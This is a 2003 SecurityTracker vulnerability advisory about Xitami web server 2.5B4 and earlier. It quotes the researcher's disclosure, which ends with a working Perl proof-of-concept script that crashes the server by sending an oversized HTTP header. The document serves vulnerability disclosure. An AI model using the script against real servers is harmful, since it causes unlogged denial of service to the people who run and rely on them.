SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Xitami Web Server Vendors:   iMatix
Xitami Web Server Can Be Crashed By Remote Users Sending Large HTTP GET Request Headers
SecurityTracker Alert ID:  1007774
SecurityTracker URL:  http://securitytracker.com/id/1007774
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 22 2003
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 2.5B4 and prior versions
Description:   A vulnerability was reported in the Xitami web server. A remote user can cause the web service to crash.

It is reported that a remote user can supply an HTTP GET request for a '.shtm' page with a header field containing 5154 bytes or more followed by a colon character (':') to cause the web service to crash.

A manual restart is required to return the service to normal operations.

The request will not be logged, according to the report.

The vendor was reportedly notificed on September 4 and September 5, 2003 without response.

Impact:   A remote user can cause the web service to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.xitami.com (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Denial of service vulnerability in Xitami Open Source Web Server


Denial of service vulnerability in Xitami Open Source Web Server
================================================================

Date: 22.09.2003
=====


Affected Systems
================

The vulnerability was discovered on several versions (production and 
beta) of Xitami
webserver for Windows NT:

- Xitami 2.5B4 (bw3225b4.exe)
- Xitami 2.5B4 (bs3225b4.exe)
- Xitami 2.4D9 (bw3224d9.exe)

I did no tests with the other versions and os/platforms (OS/2, Alpha, 
OpenVMS, Unix).
Therfore i can't confirm that the vulnerability exists there.

The Problem
===========

Xitami is a multiplatform open source web server and the flagship of iMatix.
The services crashes when it receives a http get request (to a .shtm 
file) with 
a header field of >= 5154 bytes, followed by a ":".
 
Xitami dies due to a Microsoft Visual C++ Runtime Error, an
abnormal program termination inside XIWIN32.EXE has occurred. 
The message is *not* followed by any Win32 exception dialog.

Vendor:
=======

iMatix was informed about the vulnerability on 04.09.2003 and 05.09.2003 
via email.
Up to now, i did not receive an answer from iMatix :(

You can visit the vendors webpage here:

http://www.ximati.com
http://www.imatix.com

Other Notes
===========
Unlike some server crashes, the service process will *not* recover from 
the crash
caused by the attack.

Successful exploitation of this vulnerability will NOT be logged, as the
service crashes.

It seems also not to be clear, what the actual production and beta release
versions are.
At http://www.xitami.com/download.htm, the current production is 2.4d9 
and the current
beta is 2.5b5.
At the same time, at http://www.imatix.com/html/xitami/index2.htm, the 
current
production is 2.5b4 and the current beta is 2.5b4?!?

Author:
=======
Oliver Karow (oliver.karow[at]gmx.de)

Exploitation
============

#!/usr/local/bin/perl
#
# Simple exploit for Imatix Xitami Webserver on Windows NT  
#
# Sending a GET request for a *.shtm file with a header field of >= 5154 
bytes, followed by a ":",
# will crash the service.
#
# Vulnerable versions:
# - Xitami 2.5B4 (bw3225b4.exe)
# - Xitami 2.5B4 (bs3225b4.exe)
# - Xitami 2.4D9 (bw3224d9.exe)
# - others?
#
# For legal purposes only !
#
# 22.09.2003 - Oliver Karow - oliver.karow[AT]gmx.de

use IO::Socket;

$ip="127.0.0.1";
$port=80;

$var="A" x 5157;

$mySocket=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip, 
PeerPort=>$port, Timeout=>5);
$mySocket->autoflush(1);
  print $mySocket "GET /test.shtm HTTP/1.0\r\n".
        $var.": */*\r\n\r\n"; 

@answer=<$mySocket>;
$length=@answer;
if ($length==0){die "\nService killed!\n";}
print @answer;


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC